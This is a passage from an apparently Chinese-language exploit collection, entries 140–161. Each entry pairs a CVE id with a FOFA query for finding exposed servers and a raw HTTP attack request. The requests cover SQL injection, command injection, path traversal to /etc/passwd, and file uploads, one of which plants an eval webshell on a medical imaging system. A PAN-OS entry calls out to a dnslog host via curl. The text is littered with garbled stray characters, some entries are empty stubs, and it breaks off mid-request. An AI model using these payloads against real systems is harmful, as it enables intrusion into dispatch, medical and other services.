& ?* h# _* o' |/ z8 O9 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0* a' g6 c2 Y% }9 F8 c; f" e4 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; P. u a) G, Q1 l) WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 _& o; L2 y9 J: U
Accept-Encoding: gzip, deflate, br+ `3 V. A# d: N7 V5 |; a. N
Connection: close
3 G1 t) ^# c9 W* X$ Q# bCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk9 P/ l) N) Z; H. b5 _* q- I+ N! u0 l
Upgrade-Insecure-Requests: 1' n7 Q. f' W7 B( s0 h0 O
$ M- G$ F& @5 V4 @6 F9 x) o5 l% [1 n9 i
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
8 e# m6 G+ i( h4 OCVE-2024-2566
) O" a- o! t0 y' E9 Z% ]: q6 XFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"$ z% j* x+ n5 Q4 B
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.19 ^. t4 Q3 z; m2 h7 x
Host: x.x.x.x
* l5 g2 e2 e# c) k) G+ s( b* fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
2 a% ?7 _. `" N2 g# ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 w5 j! p( ?) w/ gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" ~: s4 w. e0 }! d0 jAccept-Encoding: gzip, deflate, br8 m1 \4 L" [" {. J, v6 r# G1 [) z
Connection: close4 ? a7 u! R# J4 _. t! K! G U
Cookie: authcode=h8g9
3 x4 j, M# p7 cUpgrade-Insecure-Requests: 13 ^/ k& ^' N4 @1 c
# Z1 n0 n0 v, q
. S9 F, X: k( e
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
/ H" f* s8 y, z( _$ K R1 T. QFOFA:body="指挥调度管理平台"
& k) ]& }3 T4 \# z; i' g$ z% PPOST /app/ext/ajax_users.php HTTP/1.1
, j/ P8 P/ ?* E6 R) U, gHost: your-ip( i/ `/ f: Z6 ?1 G6 \
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info" n/ k$ b; c5 n B2 s, @, a
Content-Type: application/x-www-form-urlencoded
* r! k3 `9 n8 o4 K% v
& v% o3 ^- J: g
3 }% W7 X- h* L+ ^9 \1 q8 y2 V2 zdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
$ ]# X6 f) O/ Q( T+ A+ O {3 N
Y- E7 O" X! a* w' q" F6 L) m x* A
142. CMSV6车辆监控平台系统中存在弱密码: ^& b# j3 p; O7 t
CVE-2024-29666
& y i; j; q+ y( qFOFA:body="/808gps/"
1 u Y1 [# ]) B" ?4 tadmin/admin$ [% l- S, D8 [2 j+ ^( V6 x& e1 y
143. Netis WF2780 v2.1.40144 远程命令执行- L' Y9 X+ b, {" q s0 q2 t
CVE-2024-25850
- h9 T5 ^9 J# g! ~; R# WFOFA:title='AP setup' && header='netis'2 \, z Y# h* D! m) j( W4 W
PAYLOAD
/ K& w4 M# U$ W( Y+ a
" U3 @# {" d' }) H6 W- Y144. D-Link nas_sharing.cgi 命令注入' ^, d! ], f( C% W( D; t' m
FOFA:app="D_Link-DNS-ShareCenter"- l- g5 l! T) [2 G
system参数用于传要执行的命令
b* L5 C( A" }$ _GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1, `/ j% \% Z$ Q1 j" g4 b
Host: x.x.x.x
4 B2 m% }" z( Z8 i t+ c6 ]+ U, BUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
* B% p! Y$ n/ o# l( mConnection: close
8 i% j6 F- G2 LAccept: */** ?+ c- c" L7 R
Accept-Language: en8 d5 L4 y3 P8 W# _4 m
Accept-Encoding: gzip* P, `6 G9 g! _1 }3 a( h, P2 q
% B: g" t$ I. W) |! c8 u; L4 W8 @) ]
+ M$ Q6 X; s- t' h6 ?
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入2 Z, C6 p( R% ^3 W9 K
CVE-2024-3400( P4 N. Y4 c# y
FOFA:icon_hash="-631559155"
6 N5 f# v5 ]: C! BGET /global-protect/login.esp HTTP/1.1) \4 G# j: V+ T' ^( T7 O
Host: 192.168.30.112:10055 }, K; F; N% m; X8 ?' d, ~' E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
. e0 }8 I. j4 K. _1 g! t, qConnection: close
- `7 G! M. U3 z: LCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;0 G: k, C0 y) o6 R9 K$ d
Accept-Encoding: gzip$ I! s$ S4 m0 S* N q
- o9 `( `% }$ C, ~
1 A0 J3 [% p0 N0 \2 {% v2 N) Y
146. MajorDoMo thumb.php 未授权远程代码执行3 q6 v U0 n3 n7 R% k
CNVD-2024-02175# r; u* J6 x1 k* c I$ ?% ~
FOFA:app="MajordomoSL"
) U* d: d- k) k, F2 ?GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1- ?9 T9 ]+ r0 J: S- j* e1 Y, [- m4 m
Host: x.x.x.x1 n9 F9 V- x; r( o" H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.846 [% C* M0 \$ `2 U, M E ?, g
Accept-Charset: utf-8
; \: `5 Y+ m/ g* M; i7 WAccept-Encoding: gzip, deflate7 [3 L3 e4 o0 e$ k5 o0 m. H
Connection: close
4 g( x, h k, X) z5 N* M$ k v, p( R( J
/ ?( @- L' Y9 d$ r+ W8 J' P2 B% H+ J1 u8 W3 ^$ O! [8 D+ o
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历) Q$ H$ e6 |! J1 T" q* q
CVE-2024-323999 `+ q1 R: b, \! ?2 v/ i
FOFA:body="RaidenMAILD"
4 G6 l2 t+ R$ D7 [. VGET /webeditor/../../../windows/win.ini HTTP/1.1
) e9 Y8 o5 u3 x% nHost: 127.0.0.1:81
, M, }8 |% V' f7 fCache-Control: max-age=0
& `8 T* P4 b( i- `9 M& OConnection: close
% d7 ~5 `( |* b7 f! Z% e, ~
7 C, R% }% A) O- i* K& e5 {4 }9 m
3 g8 i J! x3 {) A" ?7 c148. CrushFTP 认证绕过模板注入0 W$ Q$ \2 m# f S$ e% K
CVE-2024-4040
2 @9 {( J2 }# _. L* e+ j# yFOFA:body="CrushFTP"
7 \/ {0 B1 d" O; ^4 @- D& XPAYLOAD
& o+ U9 y: V; C, N0 |4 u6 T b
6 i. @ c, `3 o, }2 C149. AJ-Report开源数据大屏存在远程命令执行7 Q0 A6 y( |$ t5 t+ X. }
FOFA:title="AJ-Report"0 w. K ]! b7 o8 {: {# }+ D
1 W( C# }! M: `2 @( l' W; Q& y4 p
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
2 |: U4 ^: Y+ p" M) F! ]; }; EHost: x.x.x.x6 P0 Q- c0 y: u4 Z% _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
9 A( s0 `7 {, L4 u% O- j& f TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* p& H. o3 b3 ~% v; N% O+ m" b2 O! ^3 _Accept-Encoding: gzip, deflate, br+ V& m1 t8 Q7 o9 s- P& _+ K. \5 s
Accept-Language: zh-CN,zh;q=0.96 g. g1 D) W3 o2 A! R' W& j$ ]
Content-Type: application/json;charset=UTF-8
! B5 f/ L# s" `$ x& B* d4 A8 \Connection: close' S+ w% k4 I f% `3 w3 ^
' i6 l9 x* c# U4 ^1 J: W- a
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}; E! H2 L) o, W8 s
# c& ?" v& E1 D. e: ]150. AJ-Report 1.4.0 认证绕过与远程代码执行
* \$ M+ T( i1 i3 ^; z1 iFOFA:title="AJ-Report"3 d1 @& C$ d/ G# r
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
; L' z2 S) }' P$ F$ }Host: x.x.x.x
# k5 w. F0 w1 D! Q% A/ IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
' m3 _0 n! c c/ o, }! ]. j' ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; C6 p/ p/ E jAccept-Encoding: gzip, deflate, br4 Q* J* x9 H0 {7 i' R E
Accept-Language: zh-CN,zh;q=0.9% ~8 g3 Z, I/ J9 R
Content-Type: application/json;charset=UTF-81 A& L( A( Q0 D# o6 p# [0 j0 Z
Connection: close
+ h7 W7 T# e# CContent-Length: 339, ~& H1 s+ L$ ]
: Z7 h/ Q! r8 H- r8 l- M7 f{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}: k9 c3 c {9 \& F% r
" b2 d+ n0 z$ A$ O* Y, O/ B+ u8 M! N) J
151. AJ-Report 1.4.1 pageList sql注入
& i( U; {: i6 O- S! A9 \- k8 mFOFA:title="AJ-Report". G9 i, }7 S$ X( S* H+ M, y/ R" J: {
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
7 J8 ]5 }8 E" ?Host: x.x.x.x$ v. u& c7 H0 j1 N6 z4 n- G! H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. i# C1 w Z) Q6 O/ \, LConnection: close" b1 y7 K+ D- j* j. d7 P$ {* S
Accept-Encoding: gzip$ ?$ N# k" k( ]; l2 I$ ^
6 L8 y c7 Z) P% v
+ F0 `! f4 \' B4 Q9 N) @' b152. Progress Kemp LoadMaster 远程命令执行
u5 e& O' B) r) h( ^. I! ]CVE-2024-1212/ D0 K% c: Y! l7 {( E
LoadMaster <= 7.2.59.2 (GA)
# B8 Q# w8 {7 |/ c/ R/ U& ?LoadMaster<=7.2.54.8 (LTSF)
" k; [8 X7 I1 I# A0 B+ fLoadMaster <= 7.2.48.10 (LTS)+ E# I! T8 B A" D/ l! V ^$ c
FOFA:body="LoadMaster"
4 h7 S3 L1 g& ^! HJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码9 R5 S. [% j4 o' S5 p, d, N
GET /access/set?param=enableapi&value=1 HTTP/1.1; @: U* P! E4 N! `
Host: x.x.x.x
+ N- \! q$ x: X- q* U1 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
7 L3 F$ A2 T# w0 O) GConnection: close5 A5 P1 B* Y$ ?. @* K% y
Accept: */*$ {- ` ~8 i9 g- `3 G
Accept-Language: en* I9 }; N w' J4 k. N$ P7 M
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
7 `3 \- F! P* o' n/ pAccept-Encoding: gzip
1 Q5 B2 V4 }/ T/ y7 b! |# {$ C' b
1 m% q7 M6 a( _& ^
153. gradio任意文件读取7 g- P: w$ { {" O
CVE-2024-1561FOFA:body="__gradio_mode__", v0 ?7 C+ j7 z5 N+ f' S
第一步,请求/config文件获取componets的id
0 d& v4 I2 J6 @& M) F9 [http://x.x.x.x/config0 J6 t# k$ M* f3 Q& Q
4 L) J) k% C& ^( T6 t
7 l: z' ~) k" N, R8 ^) [第二步,将/etc/passwd的内容写入到一个临时文件
8 V, m& D7 T9 {) y, @$ Z8 V$ sPOST /component_server HTTP/1.14 o9 r, Y) G f4 p" ?" ^+ G9 N/ [
Host: x.x.x.x
# h+ p! p% M; I! a% y% yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
" X7 j: v- M7 v. GConnection: close) p. H/ e' Q' O( m* O F
Content-Length: 115; @: s3 A9 r% |9 E# ^. L
Content-Type: application/json! M V$ h! L' S7 c+ N) `9 l5 Y
Accept-Encoding: gzip
" n% q5 p+ Z- Q7 B/ k% S
. }+ b( ~0 u5 Q$ w" A% v0 `{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}' L9 Y( p! }# ^$ u8 {! ~2 j: f
6 D) ]& j s( e I( e: L+ D
' i0 b! [/ S3 c' F第三步访问. ~9 ^- W y1 l8 ^9 t
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
2 e0 ~/ ? M( I
; t' k2 L: Q# S4 D7 h/ w4 z' L2 I4 V1 `( M5 H7 r& m
154. 天维尔消防救援作战调度平台 SQL注入, T ~- M/ g0 _! R* ^: B
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
; j" @5 A) Q& e9 E# R: [3 z2 mPOST /twms-service-mfs/mfsNotice/page HTTP/1.1
$ c4 s; V, z& T* A! h3 Q1 qHost: x.x.x.x( u5 G r* v) o0 ^2 Z) {
Content-Length: 106
1 |: E3 }8 Q/ D) _4 P3 U( H4 ZCache-Control: max-age=0
- R3 e D4 J7 r; RUpgrade-Insecure-Requests: 1
: m, f ?1 l- _' I9 c& A: P1 uOrigin: http://x.x.x.x
: H3 \, b- L* m iContent-Type: application/json. G- {4 k' `6 J+ a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36* s1 s+ \ o/ R, ^ M; p2 v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; w$ h& |6 @! g% \- ]Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
+ P* S" A9 g- r* |1 HAccept-Encoding: gzip, deflate
! \ T/ `& p5 |$ DAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
1 S; y. d; v6 @1 j R0 SConnection: close8 P* H I3 t8 g8 s
1 G# e n2 M$ I! f* b{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
8 N+ f, Y% I- t7 E4 Y8 |
+ o8 y# B0 _( ]6 l& L x$ V2 g* E, g C' ]
155. 六零导航页 file.php 任意文件上传( |+ f Q1 u8 _3 v
CVE-2024-34982
) \7 ]" R4 B$ m; XFOFA:title=="上网导航 - LyLme Spage"2 A1 ]- P% {: \3 O3 g2 e2 T5 H! c
POST /include/file.php HTTP/1.1
, ~" Y8 E* D6 t1 p4 V+ Q) KHost: x.x.x.x
( E7 H( w" C# oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
. b, a2 i) x) S+ J; I9 z3 {8 `Connection: close# a! v7 U, k" N. O. i% s
Content-Length: 232
3 t7 Z5 e) \* K- m2 V8 qAccept: application/json, text/javascript, */*; q=0.01
3 ^( j. S$ t- w+ @Accept-Encoding: gzip, deflate, br
3 v+ H$ P, ]/ @( QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' J* [2 L1 I. i3 ^1 `Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
' [# h" I1 g( z/ @ {X-Requested-With: XMLHttpRequest
7 W W9 `8 X9 t& \- |" R% V# p2 d, D; v
/ c% q4 L/ s7 W3 q# b' F1 ^9 i-----------------------------qttl7vemrsold314zg0f9 \: w. t3 `1 i6 H
Content-Disposition: form-data; name="file"; filename="test.php"* X5 k! Z; M3 C$ l2 F
Content-Type: image/png: ^# B$ m( y/ A/ c
; a6 ~9 @; a$ B% ^<?php phpinfo();unlink(__FILE__);?>
; D' W) a. s. [$ d, `/ ]-----------------------------qttl7vemrsold314zg0f--& W7 F3 z( s. o- w$ b* U2 G
' A9 z) @7 t4 S( j1 y- Q5 z9 @
! r$ r3 p! F F. d5 }* Z; j访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php1 i+ m3 U+ Z% o1 R& r# a
& E8 U/ {* X- g( _' k9 r156. TBK DVR-4104/DVR-4216 操作系统命令注入
" Y# E( T3 ~7 O% ^CVE-2024-3721+ T1 m* ~8 _7 [. D
FOFA:"Location: /login.rsp"7 c, J' C: |3 {0 n, w) k, Q! N
·TBK DVR-4104; i& { ?: ~/ E1 v
·TBK DVR-4216
+ B7 A+ U2 K u% { ]curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"* @6 g2 [7 U9 W+ m# b: X
0 V# l7 j* q& B$ S* [7 @, m
# a, u3 o# X) WPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.18 k5 S, @5 c4 Z2 x8 D2 A! H& T
Host: x.x.x.x
: C; I# P5 @* u$ CUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! L3 F f& f% nConnection: close# w! ?3 Z# z2 M0 ?: H' \
Content-Length: 02 r' u' d( Y* t; a
Cookie: uid=1
0 J4 |* T* U; [6 {/ D, GAccept-Encoding: gzip9 f8 A8 ~; G$ f9 h
- Q' u! |5 v( v* G' |8 Y" t& W0 T
: v% o* G: R1 q1 P9 \4 a2 V7 V157. 美特CRM upload.jsp 任意文件上传
" [% p! B o7 l5 w" V0 e" F' a: y6 OCNVD-2023-06971
- I }& e( c$ O/ D5 qFOFA:body="/common/scripts/basic.js"
- ?$ l9 H" b3 ~: Z# m% V8 SPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1# x! J4 _1 T9 l c/ G
Host: x.x.x.x
' L2 ]) {+ d5 G7 Y6 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
9 s3 J9 i/ N4 A N* \% k& aContent-Length: 7092 h' _' Q+ B7 P, V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* O3 d' K- Z1 S- f$ y8 a
Accept-Encoding: gzip, deflate
# r: w" ?( l7 V5 v* y! J2 uAccept-Language: zh-CN,zh;q=0.9
6 p. h( h9 G: M, a& GCache-Control: max-age=0
; [- v: V4 f9 ]' \" X4 {Connection: close. R7 o) Y3 P9 D/ S3 x6 i- b' H% _: X
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
' X6 ^8 [5 W% n, N: g7 VUpgrade-Insecure-Requests: 1
k4 d: f& ^, C4 @" u
9 k4 t4 q9 x0 K3 p* Z% @- \9 U' ]------WebKitFormBoundary1imovELzPsfzp5dN4 Z4 W$ t4 q6 u" s% L
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"# \+ n9 j2 U* t1 H3 X& G* {+ }
Content-Type: application/octet-stream6 r* B+ i' ~+ d$ b' {$ y! K
5 W; I4 `2 d Z, z) O
nyhelxrutzwhrsvsrafb. \4 T' g k! v5 F5 I
------WebKitFormBoundary1imovELzPsfzp5dN
T5 g) [! Q: V' {5 b. k! R* b. FContent-Disposition: form-data; name="key"
' b7 U. y, I% |1 m3 z2 p( x) q M6 p. U. h' b- s1 d" C8 X# J
null
1 Z! i1 s, k. I------WebKitFormBoundary1imovELzPsfzp5dN$ n9 A7 J; E6 o6 o! M% d2 V
Content-Disposition: form-data; name="form"
# p" u# M4 b/ n
! a- h+ q3 |" z7 o1 D- T- \null
* V+ `' Q+ Q, h! o' E. m/ P------WebKitFormBoundary1imovELzPsfzp5dN6 `: s% J, M% q9 M
Content-Disposition: form-data; name="field"
! b: T2 j o# R
6 U9 @: o! A" ynull5 [/ ] X }2 T2 P1 }, n
------WebKitFormBoundary1imovELzPsfzp5dN
/ Q: P" w- `/ w% j; t& g% f/ a% rContent-Disposition: form-data; name="filetitile"
0 | p6 @$ \ y: X: ]/ Z( G
! V# q/ Q2 M0 d0 h4 g( Y# g5 hnull: T! \% e1 G! F+ [: e
------WebKitFormBoundary1imovELzPsfzp5dN' Y( _9 r: H2 g& t; R8 v# Q9 ^
Content-Disposition: form-data; name="filefolder"
R" F* h! T6 _! i# y
0 u4 O' I4 U% Q+ J3 x/ `9 [null
6 Q0 y0 A& _+ \0 m/ K------WebKitFormBoundary1imovELzPsfzp5dN--! L* I b4 Z6 J- c! w" j" t+ S9 E
5 ^, @/ z7 D/ ~4 j& N! V
8 ?" P+ n) A9 |2 Fhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp8 V2 `; @. @. \, u+ P' |2 X
, n5 {0 @) O ~" g
158. Mura-CMS-processAsyncObject存在SQL注入9 Z4 z& X2 m* J. a' E
CVE-2024-32640
. M5 y; ^5 m! n+ h4 o$ E2 gFOFA:"Generator: Masa CMS"/ ]$ B# d- h# J. g' p0 o! m
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1* w& R6 J7 p+ f3 F& w; c. Y
Host: {{Hostname}}( o ?* Z x _7 [+ ?7 S' q
Content-Type: application/x-www-form-urlencoded
0 L, F8 F: ~, k/ Y% g& \: R' P# o+ n' o6 G
object=displayregion&contenthistid=x\'&previewid=1
0 O( k/ h8 V" p) k
5 C! U1 q) }1 C6 C; ]1 x* _* |! w4 N3 q
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传0 E: T8 L, A7 s1 ]1 B
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
* X7 e8 z2 R, e' e" f/ z# |) UPOST /webservices/WebJobUpload.asmx HTTP/1.1) T: [5 w/ P; }4 _
Host: x.x.x.x% T4 K. s( Y3 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36' i# ~' J: H i! P _1 q
Content-Length: 1080
5 M. u& T8 x% ?/ ^/ h$ UAccept-Encoding: gzip, deflate6 g( }" S* o; v" G) q |- y; A
Connection: close
) p" u. V. I y! T) hContent-Type: text/xml; charset=utf-82 h+ ~* }- b& ~. a' R! m% b
Soapaction: "http://rainier/jobUpload"& D/ O$ w$ l" B) S8 J9 F8 q l0 P
8 O* r, `. d3 A2 B1 p! ]
<?xml version="1.0" encoding="utf-8"?>
1 Y* c9 h; v6 Q% \+ Z: s<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">! E7 x4 K/ z( T$ M2 j/ P G
<soap:Body>
8 ^4 G/ x+ ~* T# N+ D) P* Y7 I5 x8 L+ N<jobUpload xmlns="http://rainier">
! o: H: N+ ~$ B$ J# Z/ x<vcode>1</vcode>+ T- n) R$ V/ `- `9 g. E
<subFolder></subFolder>/ E( z' M3 M9 u8 e2 i; |: s
<fileName>abcrce.asmx</fileName>) |) w7 C; u( A% z0 m' ~/ t- d
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
5 I4 Q- c% u( S' s& ~7 p. f8 z</jobUpload>
8 C5 ~7 h q S" x, f' t9 ~</soap:Body>( z3 l; y- B1 D. b' H+ e
</soap:Envelope> n! \1 T$ O2 m4 z
. z( p* a \) R* y3 d% ?& w
/ v% U# o1 z3 z9 F+ K/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
@( _" e' }* f0 U3 X! \" o B6 M/ q8 S& x: z& p) d2 }
7 c( K% F+ p1 Z3 ^
160. Sonatype Nexus Repository 3目录遍历与文件读取
6 m8 m! O7 T2 I* N. |1 PCVE-2024-49567 e2 w& a5 M8 @8 b/ |
FOFA:title="Nexus Repository Manager"
' ?3 f- X9 w4 t4 QGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.17 X0 R0 T4 l# }& j
Host: x.x.x.x
6 o* V6 |+ I4 L6 m0 OUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.09 \. o- X3 S$ q( j& O4 f: ~
Connection: close
! I+ [0 W: G6 r* U- @2 \9 E7 mAccept: */*6 s3 v6 A7 u& J" b* _4 n6 p: s
Accept-Language: en5 N- t, w) p$ m- Z9 L
Accept-Encoding: gzip5 R7 a4 {4 ^1 S# H4 ?6 `
, o6 ~- k7 G8 V, M
7 [3 q5 x$ g; o9 D* E! r
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传. p) X. k3 I5 `2 O l* ?& H5 K
FOFA:body="/KT_Css/qd_defaul.css"
# _; [. I4 h* H( ^: x; X第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
4 m. c) J- y. K$ h7 ]8 QPOST /Webservice.asmx HTTP/1.12 g6 C# b& Z/ j% y+ G# S+ \
Host: x.x.x.x6 I% t( a9 _6 X% j! q9 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.367 n. o p, o/ w0 A9 ]% d
Connection: close
2 v4 ]9 p5 C7 f" M; nContent-Length: 445' I# C1 g8 q6 K
Content-Type: text/xml
( w! v! B2 }, {+ X# \7 p0 |$ VAccept-Encoding: gzip6 q1 e, c, w. b! \7 M |8 d S1 L
7 K6 N1 C1 ^& Y' S' A* ?' |: k<?xml version="1.0" encoding="utf-8"?>* f9 Z& v, Y/ j6 d, c
<soap:Envelope xmlns:xsi="( p/ C5 S2 ^% v& v) S4 K
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" i% H0 n1 Q0 Z9 R* {5 W$ v2 Y
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
$ p. A' @+ x; {<soap:Body>" f7 O. _! q' d8 f$ |3 C/ j+ s# E
<UploadResume xmlns="http://tempuri.org/">
5 t% m9 _" s C; M<ip>1</ip>5 D. b6 Q) L& p( R* c
